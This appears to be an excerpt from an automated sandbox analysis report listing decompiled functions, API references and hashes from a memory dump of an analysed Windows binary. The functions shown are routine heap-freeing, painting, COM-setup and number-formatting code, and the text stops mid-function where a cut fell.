Instruction Fuzzy Hash: C0313931100605EFCF25DF55CD45AAB7BB1FF48720B108A1DF8A6966A0E731EA20DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00CEC1E5, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CEC1E5(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xd0f740; // 0xd0f794
					if(_t23 != 0) {
						E00CE46CC(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xd0f744; // 0xe3a3bc
					if(_t24 != 0) {
						E00CE46CC(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xd0f748; // 0xe3a3bc
					if(_t25 != 0) {
						E00CE46CC(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xd0f770; // 0xd0f798
					if(_t26 != 0) {
						E00CE46CC(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xd0f774; // 0xe3a3c0
					if(_t27 != 0) {
						return E00CE46CC(_t6);
					}
				}
				return _t6;
			}

0x00cec1eb
0x00cec1f0
0x00cec1f4
0x00cec1fa
0x00cec1fd
0x00cec202
0x00cec206
0x00cec20c
0x00cec20f
0x00cec214
0x00cec218
0x00cec21e
0x00cec221
0x00cec226
0x00cec22a
0x00cec230
0x00cec233
0x00cec238
0x00cec239
0x00cec23c
0x00cec242
0x00000000
0x00cec24a
0x00cec242
0x00cec24d

APIs

_free.LIBCMT ref: 00CEC1FD

Part of subcall function 00CE46CC: HeapFree.KERNEL32(00000000,00000000,?,00CEC574,?,00000000,?,?,?,00CEC896,?,00000007,?,?,00CECFAC,?), ref: 00CE46E2
Part of subcall function 00CE46CC: GetLastError.KERNEL32(?,?,00CEC574,?,00000000,?,?,?,00CEC896,?,00000007,?,?,00CECFAC,?,?), ref: 00CE46F4

_free.LIBCMT ref: 00CEC20F
_free.LIBCMT ref: 00CEC221
_free.LIBCMT ref: 00CEC233
_free.LIBCMT ref: 00CEC245

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0870c48b87b6da79b4a4e23dfb3cbcf22c461597f53e2f50b25df3f041dc299c
Instruction ID: 39bfd7aee2915787950a4799bea6ebc67711b5495d420aba3d0551e1a7563af7
Opcode Fuzzy Hash: 0870c48b87b6da79b4a4e23dfb3cbcf22c461597f53e2f50b25df3f041dc299c
Instruction Fuzzy Hash: 21F06DB25047C0ABC628EBEAF8C2D1A73DDFA417107681815F158D7A22CB30FD818A64

Uniqueness

Uniqueness Score: -1.00%

Function 00CB7B2B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00CB7B2B(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a8) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagPAINTSTRUCT _v88;
				struct tagRECT* _v124;
				intOrPtr _v128;
				signed int _v140;
				intOrPtr _v144;
				char _v148;
				signed int _t20;
				intOrPtr _t38;
				struct HDC__* _t46;
				intOrPtr* _t48;
				signed int _t49;

				_t20 =  *0xd0f014; // 0xbb5e653b
				_v8 = _t20 ^ _t49;
				_t38 = _a8;
				_t48 = __ecx;
				if(_t38 == 0) {
					_t46 = BeginPaint( *( *(__ecx + 0x3c)),  &_v88);
				} else {
					_t46 = _t38;
				}
				if(_t46 != 0) {
					GetClientRect( *( *(_t48 + 0x3c)),  &_v24);
					E00CC1E00(_t46,  &_v148, 0, 0x3c);
					_v140 = _v140 | 0xffffffff;
					_v124 =  &_v24;
					_v148 = 0x3c;
					_v144 = 1;
					_v128 = _t46;
					 *((intOrPtr*)( *_t48 + 0xc))( &_v148);
					if(_t38 == 0) {
						EndPaint( *( *(_t48 + 0x3c)),  &_v88);
					}
				}
				return E00CBDC11(_v8 ^ _t49);
			}

0x00cb7b34
0x00cb7b3b
0x00cb7b3f
0x00cb7b43
0x00cb7b48
0x00cb7b5d
0x00cb7b4a
0x00cb7b4a
0x00cb7b4a
0x00cb7b61
0x00cb7b6c
0x00cb7b7d
0x00cb7b82
0x00cb7b8f
0x00cb7b9a
0x00cb7ba4
0x00cb7bb1
0x00cb7bb4
0x00cb7bb9
0x00cb7bc4
0x00cb7bc4
0x00cb7bb9
0x00cb7bda

APIs

BeginPaint.USER32(?,?), ref: 00CB7B57
GetClientRect.USER32 ref: 00CB7B6C
EndPaint.USER32(?,?), ref: 00CB7BC4

Strings

<, xrefs: 00CB7B9A

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: Paint$BeginClientRect
String ID: <
API String ID: 1423913981-4251816714
Opcode ID: 68154f2e17e74f7d1e4d75833a975208fd7e9ea44c49f3ff9e8d9b545879ed01
Instruction ID: 4be5b1b27952ab61544a20efee68943e48789efde27ca411498ffbaac8cf43bc
Opcode Fuzzy Hash: 68154f2e17e74f7d1e4d75833a975208fd7e9ea44c49f3ff9e8d9b545879ed01
Instruction Fuzzy Hash: E5216D716002089FDB20DFA4C884FAEB7F8FF48304F604569E916D7251EB70AA08DF11

Uniqueness

Uniqueness Score: -1.00%

Function 00CBBBA4, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00CBBBA4(intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t17;
				intOrPtr _t20;
				void* _t25;
				void* _t28;
				intOrPtr _t30;

				_t20 = _a4;
				if( *((char*)(_t20 + 0xcc)) != 0) {
					return 0;
				}
				_t26 = _t20 + 0xd0;
				__imp__CoCreateInstance(0xd08574, 0, 0x17, 0xd07da4, _t20 + 0xd0, _t25, _t28);
				E00CBB845(_t20,  *_t26, _t20 + 0xa0, _t26, _t20 + 0xb0, _t20 + 0xb0, _t20 + 0xc0, _t20 + 0xc2);
				_t17 = E00CBBD6E(_t20 + 0x9c,  *_t26, _t29);
				_t30 = _t17;
				if(_t30 == 0) {
					 *((char*)(_t20 + 0xcc)) = 1;
					__imp__#6( *((intOrPtr*)(_t20 + 0xe0)));
					__imp__#2(L"Hulk");
					 *((intOrPtr*)(_t20 + 0xe0)) = _t17;
					E00CB7968(_t20 + 4);
				}
				return _t30;
			}

0x00cbbba8
0x00cbbbb2
0x00000000
0x00cbbc3d
0x00cbbbba
0x00cbbbcf
0x00cbbbf2
0x00cbbc00
0x00cbbc05
0x00cbbc09
0x00cbbc11
0x00cbbc18
0x00cbbc23
0x00cbbc2c
0x00cbbc32
0x00cbbc32
0x00000000

APIs

CoCreateInstance.OLE32(00D08574,00000000,00000017,00D07DA4,?), ref: 00CBBBCF
SysFreeString.OLEAUT32(?), ref: 00CBBC18
SysAllocString.OLEAUT32(Hulk), ref: 00CBBC23

Part of subcall function 00CB7968: InvalidateRect.USER32(?,00000000,00000001,00CB770A), ref: 00CB797C

Strings

Hulk, xrefs: 00CBBC1E

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocCreateFreeInstanceInvalidateRect
String ID: Hulk
API String ID: 4193809495-1056348430
Opcode ID: 015c322a598e0971949cb264a26ddf5af140c5b8b4a3f34aad3a3268337bfc6c
Instruction ID: 335e405d318291fada340ad5c18eea98f9ad08bef7084b7b29b193b925a9fdaa
Opcode Fuzzy Hash: 015c322a598e0971949cb264a26ddf5af140c5b8b4a3f34aad3a3268337bfc6c
Instruction Fuzzy Hash: 7F016932501219AFDB10DF94DC84FEA7B68BF14700F08417AED09AF19ACBA06904CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00CB2177, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 18%

			E00CB2177(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t8;
				intOrPtr* _t12;

				_t12 = __ecx;
				if( *__ecx == 0) {
					if( *((intOrPtr*)(__ecx + 4)) == 0) {
						L6:
						return 1;
					}
					return RegDeleteKeyA();
				}
				_t7 = GetModuleHandleA("Advapi32.dll");
				if(_t7 == 0) {
					goto L6;
				}
				_t8 = GetProcAddress(_t7, "RegDeleteKeyTransactedA");
				if(_t8 == 0) {
					goto L6;
				}
				return  *_t8(_a4, _a8, 0, 0,  *_t12, 0);
			}

0x00cb217b
0x00cb2182
0x00cb21b5
0x00cb21c0
0x00000000
0x00cb21c2
0x00cb21ba
0x00cb21ba
0x00cb2189
0x00cb2191
0x00000000
0x00000000
0x00cb2199
0x00cb21a1
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00CB2189
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 00CB2199

Strings

Advapi32.dll, xrefs: 00CB2184
RegDeleteKeyTransactedA, xrefs: 00CB2193

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyTransactedA
API String ID: 1646373207-1972538232
Opcode ID: 452956e090f459968995bd4636d28063a9d570794bea076f4900e40655ba617c
Instruction ID: 8a5a45ee92a00df3fc59f8eba931eeba4aa73ed19045a5c7996e4dc5b014e534
Opcode Fuzzy Hash: 452956e090f459968995bd4636d28063a9d570794bea076f4900e40655ba617c
Instruction Fuzzy Hash: 7FF0A036204200BA9B201FAAAC08FAF7BACEBC1B62704843AF655E9060D671AD45D771

Uniqueness

Uniqueness Score: -1.00%

Function 00CE5C4C, Relevance: 6.3, APIs: 4, Instructions: 321
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00CE5C4C(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v32;
				signed int _v40;
				char _v48;
				intOrPtr _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				signed char _t85;
				void* _t91;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t104;
				signed int _t105;
				void* _t106;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				void* _t119;
				signed int* _t120;
				void* _t123;
				signed int _t125;
				signed int _t131;
				signed int* _t132;
				signed int* _t135;
				signed int _t136;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t148;
				signed int _t149;
				signed int _t153;
				signed int _t154;
				void* _t158;
				unsigned int _t159;
				signed int _t166;
				void* _t167;
				signed int _t168;
				signed int* _t169;
				signed int _t172;
				signed int _t180;
				signed int _t181;
				signed int _t182;
				signed int _t184;
				signed int _t185;
				signed int _t186;

				_t167 = __edx;
				_t180 = _a24;
				if(_t180 < 0) {
					_t180 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00CCF26E( &_v60, _t167, _a36);
				_t5 = _t180 + 0xb; // 0xb
				_t192 = _a12 - _t5;
				if(_a12 > _t5) {
					_t135 = _a4;
					_t141 = _t135[1];
					_t168 =  *_t135;
					__eflags = (_t141 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t141 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						__eflags = _t141;
						if(__eflags > 0) {
							L14:
							_t169 = _t184 + 1;
							_t85 = _a28 ^ 0x00000001;
							_v20 = 0x3ff;
							_v5 = _t85;
							_v40 = _t169;
							_v32 = ((_t85 & 0x000000ff) << 5) + 7;
							__eflags = _t141 & 0x7ff00000;
							_t91 = 0x30;
							if((_t141 & 0x7ff00000) != 0) {
								 *_t184 = 0x31;
								L19:
								_t143 = 0;
								__eflags = 0;
								L20:
								_t185 =  &(_t169[0]);
								_v16 = _t185;
								__eflags = _t180;
								if(_t180 != 0) {
									_t95 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
								} else {
									_t95 = _t143;
								}
								 *_t169 = _t95;
								_t97 = _t135[1] & 0x000fffff;
								__eflags = _t97;
								_v24 = _t97;
								if(_t97 > 0) {
									L25:
									_t170 = _t143;
									_t144 = 0xf0000;
									_t98 = 0x30;
									_v12 = _t98;
									_v16 = _t143;
									_v24 = 0xf0000;
									do {
										__eflags = _t180;
										if(_t180 <= 0) {
											break;
										}
										_t123 = E00CFC1A0( *_t135 & _t170, _v12, _t135[1] & _t144 & 0x000fffff);
										_t158 = 0x30;
										_t125 = _t123 + _t158 & 0x0000ffff;
										__eflags = _t125 - 0x39;
										if(_t125 > 0x39) {
											_t125 = _t125 + _v32;
											__eflags = _t125;
										}
										_t159 = _v24;
										_t170 = (_t159 << 0x00000020 | _v16) >> 4;
										 *_t185 = _t125;
										_t185 = _t185 + 1;
										_t144 = _t159 >> 4;
										_t98 = _v12 - 4;
										_t180 = _t180 - 1;
										_v16 = (_t159 << 0x00000020 | _v16) >> 4;
										_v24 = _t159 >> 4;
										_v12 = _t98;
										__eflags = _t98;
									} while (_t98 >= 0);
									_v16 = _t185;
									__eflags = _t98;
									if(_t98 < 0) {
										goto L42;
									}
									_t119 = E00CFC1A0( *_t135 & _t170, _v12, _t135[1] & _t144 & 0x000fffff);
									__eflags = _t119 - 8;
									if(_t119 <= 8) {
										goto L42;
									}
									_t120 = _t185 - 1;
									_t139 = 0x30;
									while(1) {
										_t153 =  *_t120;
										__eflags = _t153 - 0x66;
										if(_t153 == 0x66) {
											goto L35;
										}
										__eflags = _t153 - 0x46;
										if(_t153 != 0x46) {
											_t135 = _a4;
											__eflags = _t120 - _v40;
											if(_t120 == _v40) {
												_t54 = _t120 - 1;
												 *_t54 =  *(_t120 - 1) + 1;
												__eflags =  *_t54;
											} else {
												__eflags = _t153 - 0x39;
												if(_t153 != 0x39) {
													_t154 = _t153 + 1;
													__eflags = _t154;
												} else {
													_t154 = _v32 + 0x3a;
												}
												 *_t120 = _t154;
											}
											goto L42;
										}
										L35:
										 *_t120 = _t139;
										_t120 = _t120 - 1;
									}
								} else {
									__eflags =  *_t135 - _t143;
									if( *_t135 <= _t143) {
										L42:
										__eflags = _t180;
										if(_t180 > 0) {
											_push(_t180);
											_t115 = 0x30;
											_push(_t115);
											_push(_t185);
											E00CC1E00(_t180);
											_t185 = _t185 + _t180;
											__eflags = _t185;
											_v16 = _t185;
										}
										_t99 = _v40;
										__eflags =  *_t99;
										if( *_t99 == 0) {
											_t185 = _t99;
											_v16 = _t185;
										}
										 *_t185 = (_v5 << 5) + 0x50;
										_t104 = E00CFC1A0( *_t135, 0x34, _t135[1]);
										_t186 = 0;
										_t105 = _v16;
										_t148 = (_t104 & 0x000007ff) - _v20;
										__eflags = _t148;
										asm("sbb esi, esi");
										_t172 = _t105 + 2;
										_v40 = _t172;
										if(__eflags < 0) {
											L50:
											_t148 =  ~_t148;
											asm("adc esi, 0x0");
											_t186 =  ~_t186;
											_t136 = 0x2d;
											goto L51;
										} else {
											if(__eflags > 0) {
												L49:
												_t136 = 0x2b;
												L51:
												 *(_t105 + 1) = _t136;
												_t181 = _t172;
												_t106 = 0x30;
												 *_t172 = _t106;
												_t107 = 0;
												__eflags = _t186;
												if(__eflags < 0) {
													L55:
													__eflags = _t181 - _t172;
													if(_t181 != _t172) {
														L59:
														_push(_t136);
														_push(_t107);
														_push(0x64);
														_push(_t186);
														_t108 = E00CFC0C0();
														_t186 = _t136;
														_t136 = _t148;
														_v32 = _t172;
														_t172 = _v40;
														 *_t181 = _t108 + 0x30;
														_t181 = _t181 + 1;
														_t107 = 0;
														__eflags = 0;
														L60:
														__eflags = _t181 - _t172;
														if(_t181 != _t172) {
															L64:
															_push(_t136);
															_push(_t107);
															_push(0xa);
															_push(_t186);
															_push(_t148);
															_t110 = E00CFC0C0();
															_v40 = _t172;
															 *_t181 = _t110 + 0x30;
															_t181 = _t181 + 1;
															_t107 = 0;
															__eflags = 0;
															L65:
															_t149 = _t148 + 0x30;
															__eflags = _t149;
															 *_t181 = _t149;
															 *(_t181 + 1) = _t107;
															_t182 = _t107;
															L66:
															if(_v48 != 0) {
																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
															}
															return _t182;
														}
														__eflags = _t186 - _t107;
														if(__eflags < 0) {
															goto L65;
														}
														if(__eflags > 0) {
															goto L64;
														}
														__eflags = _t148 - 0xa;
														if(_t148 < 0xa) {
															goto L65;
														}
														goto L64;
													}
													__eflags = _t186 - _t107;
													if(__eflags < 0) {
														goto L60;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t148 - 0x64;
													if(_t148 < 0x64) {
														goto L60;
													}
													goto L59;
												}
												_t136 = 0x3e8;
												if(__eflags > 0) {
													L54:
													_push(_t136);
													_push(_t107);
													_push(_t136);
													_push(_t186);
													_t113 = E00CFC0C0();
													_t186 = _t136;
													_t136 = _t148;
													_v32 = _t172;
													_t172 = _v40;
													 *_t172 = _t113 + 0x30;
													_t181 = _t172 + 1;
													_t107 = 0;
													__eflags = 0;
													goto L55;
												}
												__eflags = _t148 - 0x3e8;
												if(_t148 < 0x3e8) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t148;
											if(_t148 < 0) {
												goto L50;
											}
											goto L49;
										}
									}
									goto L25;
								}
							}
							 *_t184 = _t91;
							_t143 =  *_t135 | _t135[1] & 0x000fffff;
							__eflags = _t143;
							if(_t143 != 0) {
								_v20 = 0x3fe;
								goto L19;
							}
							_v20 = _t143;
							goto L20;
						}
						if(__eflags < 0) {
							L13:
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
							_t141 = _t135[1];
							goto L14;
						}
						__eflags = _t168;
						if(_t168 >= 0) {
							goto L14;
						}
						goto L13;
					}
					_t182 = E00CE5F67(_t135, _t141, _t135, _t184, _a12, _a16, _a20, _t180, 0, _a32, 0);
					__eflags = _t182;
					if(_t182 == 0) {
						_t131 = E00CFC510(_t184, 0x65);
						__eflags = _t131;
						if(_t131 != 0) {
							_t166 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							__eflags = _t166;
							 *_t131 = _t166;
							 *((char*)(_t131 + 3)) = 0;
						}
						_t182 = 0;
					} else {
						 *_t184 = 0;
					}
					goto L66;
				}
				_t132 = E00CDC0C4(_t192);
				_t182 = 0x22;
				 *_t132 = _t182;
				E00CDBE53();
				goto L66;
			}

0x00ce5c4c
0x00ce5c57
0x00ce5c5c
0x00ce5c5e
0x00ce5c5e
0x00ce5c62
0x00ce5c6b
0x00ce5c6d
0x00ce5c72
0x00ce5c75
0x00ce5c78
0x00ce5c8e
0x00ce5c91
0x00ce5c96
0x00ce5ca0
0x00ce5ca5
0x00ce5cf9
0x00ce5cfb
0x00ce5d0a
0x00ce5d0d
0x00ce5d10
0x00ce5d12
0x00ce5d19
0x00ce5d2b
0x00ce5d2e
0x00ce5d33
0x00ce5d37
0x00ce5d38
0x00ce5d58
0x00ce5d5b
0x00ce5d5b
0x00ce5d5b
0x00ce5d5d
0x00ce5d5d
0x00ce5d60
0x00ce5d63
0x00ce5d65
0x00ce5d76
0x00ce5d67
0x00ce5d67
0x00ce5d67
0x00ce5d78
0x00ce5d7d
0x00ce5d7d
0x00ce5d82
0x00ce5d85
0x00ce5d8f
0x00ce5d91
0x00ce5d93
0x00ce5d98
0x00ce5d99
0x00ce5d9c
0x00ce5d9f
0x00ce5da2
0x00ce5da2
0x00ce5da4
0x00000000
0x00000000
0x00ce5dbb
0x00ce5dc2
0x00ce5dc6
0x00ce5dc9
0x00ce5dcc
0x00ce5dce
0x00ce5dce
0x00ce5dce
0x00ce5dd4
0x00ce5dd7
0x00ce5ddb
0x00ce5ddd
0x00ce5de1
0x00ce5de4
0x00ce5de7
0x00ce5de8
0x00ce5deb
0x00ce5dee
0x00ce5df1
0x00ce5df1
0x00ce5df6
0x00ce5df9
0x00ce5dfc
0x00000000
0x00000000
0x00ce5e13
0x00ce5e18
0x00ce5e1c
0x00000000
0x00000000
0x00ce5e20
0x00ce5e23
0x00ce5e24
0x00ce5e24
0x00ce5e26
0x00ce5e29
0x00000000
0x00000000
0x00ce5e2b
0x00ce5e2e
0x00ce5e35
0x00ce5e38
0x00ce5e3b
0x00ce5e50
0x00ce5e50
0x00ce5e50
0x00ce5e3d
0x00ce5e3d
0x00ce5e40
0x00ce5e4a
0x00ce5e4a
0x00ce5e42
0x00ce5e45
0x00ce5e45
0x00ce5e4c
0x00ce5e4c
0x00000000
0x00ce5e3b
0x00ce5e30
0x00ce5e30
0x00ce5e32
0x00ce5e32
0x00ce5d87
0x00ce5d87
0x00ce5d89
0x00ce5e53
0x00ce5e53
0x00ce5e55
0x00ce5e57
0x00ce5e5a
0x00ce5e5b
0x00ce5e5c
0x00ce5e5d
0x00ce5e65
0x00ce5e65
0x00ce5e67
0x00ce5e67
0x00ce5e6a
0x00ce5e6d
0x00ce5e70
0x00ce5e72
0x00ce5e74
0x00ce5e74
0x00ce5e81
0x00ce5e88
0x00ce5e8f
0x00ce5e91
0x00ce5e9a
0x00ce5e9a
0x00ce5e9d
0x00ce5e9f
0x00ce5ea2
0x00ce5ea5
0x00ce5eb1
0x00ce5eb1
0x00ce5eb5
0x00ce5eb8
0x00ce5eba
0x00000000
0x00ce5ea7
0x00ce5ea7
0x00ce5ead
0x00ce5ead
0x00ce5ebb
0x00ce5ebb
0x00ce5ebe
0x00ce5ec2
0x00ce5ec3
0x00ce5ec5
0x00ce5ec7
0x00ce5ec9
0x00ce5ef3
0x00ce5ef3
0x00ce5ef5
0x00ce5f02
0x00ce5f02
0x00ce5f03
0x00ce5f04
0x00ce5f06
0x00ce5f08
0x00ce5f0d
0x00ce5f0f
0x00ce5f13
0x00ce5f16
0x00ce5f19
0x00ce5f1b
0x00ce5f1c
0x00ce5f1c
0x00ce5f1e
0x00ce5f1e
0x00ce5f20
0x00ce5f2d
0x00ce5f2d
0x00ce5f2e
0x00ce5f2f
0x00ce5f31
0x00ce5f32
0x00ce5f33
0x00ce5f3c
0x00ce5f3f
0x00ce5f41
0x00ce5f42
0x00ce5f42
0x00ce5f44
0x00ce5f44
0x00ce5f44
0x00ce5f47
0x00ce5f49
0x00ce5f4c
0x00ce5f4e
0x00ce5f54
0x00ce5f59
0x00ce5f59
0x00ce5f66
0x00ce5f66
0x00ce5f22
0x00ce5f24
0x00000000
0x00000000
0x00ce5f26
0x00000000
0x00000000
0x00ce5f28
0x00ce5f2b
0x00000000
0x00000000
0x00000000
0x00ce5f2b
0x00ce5ef7
0x00ce5ef9
0x00000000
0x00000000
0x00ce5efb
0x00000000
0x00000000
0x00ce5efd
0x00ce5f00
0x00000000
0x00000000
0x00000000
0x00ce5f00
0x00ce5ecb
0x00ce5ed0
0x00ce5ed6
0x00ce5ed6
0x00ce5ed7
0x00ce5ed8
0x00ce5ed9
0x00ce5edb
0x00ce5ee0
0x00ce5ee2
0x00ce5ee4
0x00ce5ee9
0x00ce5eec
0x00ce5eee
0x00ce5ef1
0x00ce5ef1
0x00000000
0x00ce5ef1
0x00ce5ed2
0x00ce5ed4
0x00000000
0x00000000
0x00000000
0x00ce5ed4
0x00ce5ea9
0x00ce5eab
0x00000000
0x00000000
0x00000000
0x00ce5eab
0x00ce5ea5
0x00000000
0x00ce5d89
0x00ce5d85
0x00ce5d3a
0x00ce5d46
0x00ce5d46
0x00ce5d48
0x00ce5d4f
0x00000000
0x00ce5d4f
0x00ce5d4a
0x00000000
0x00ce5d4a
0x00ce5cfd
0x00ce5d03
0x00ce5d03
0x00ce5d06
0x00ce5d06
0x00ce5d07
0x00000000
0x00ce5d07
0x00ce5cff
0x00ce5d01
0x00000000
0x00000000
0x00000000
0x00ce5d01
0x00ce5cbf
0x00ce5cc4
0x00ce5cc6
0x00ce5cd3
0x00ce5cda
0x00ce5cdc
0x00ce5ce7
0x00ce5ce7
0x00ce5cea
0x00ce5cec
0x00ce5cec
0x00ce5cf0
0x00ce5cc8
0x00ce5cc8
0x00ce5cc8
0x00000000
0x00ce5cc6
0x00ce5c7a
0x00ce5c81
0x00ce5c82
0x00ce5c84
0x00000000

APIs

_strrchr.LIBCMT ref: 00CE5CD3

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: f0a94fcd3ed04c36a60881c2a10fd4ff1c7eeb8370d2160e36cecfe0db5d8792
Instruction ID: ab421278803bef4e007b1ce567d066902e06c64bed8eb1a88f1139e58827bd5a
Opcode Fuzzy Hash: f0a94fcd3ed04c36a60881c2a10fd4ff1c7eeb8370d2160e36cecfe0db5d8792
Instruction Fuzzy Hash: 68B14B32900AC59FDB15CF6AC8917BEBBE5EF45348F2441AAE855DB342D6388F01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CB6D55, Relevance: 6.1, APIs: 4, Instructions: 133
comCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00CB6D55(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				intOrPtr* _t55;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t60;
				void* _t69;
				intOrPtr* _t70;
				void* _t75;
				void* _t79;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr* _t88;
				intOrPtr* _t108;
				void* _t111;

				_t83 = __ecx;
				_push(0x24);
				E00CFBEFA(0xcfd024, __ebx, __edi);
				_t108 = _t83;
				_t81 = 0;
				 *((intOrPtr*)(_t111 - 0x1c)) = 0;
				 *(_t111 - 4) = 0;
				 *((intOrPtr*)(_t111 - 0x18)) = 0;
				E00CB9365(_t111 - 0x24,  *((intOrPtr*)(_t108 + 0x10)));
				 *(_t111 - 4) = 2;
				_t55 =  *((intOrPtr*)(_t111 - 0x24));
				if(_t55 == 0) {
					L2:
					 *(_t111 - 0x14) = _t81;
					 *(_t111 - 4) = 3;
					 *((intOrPtr*)( *_t108 + 8))(0xd07d74, _t111 - 0x14);
					_t58 =  *(_t111 - 0x14);
					if( *((intOrPtr*)(_t111 - 0x1c)) != _t58) {
						E00CB15F2(_t111 - 0x1c, _t58, 0xd07e40);
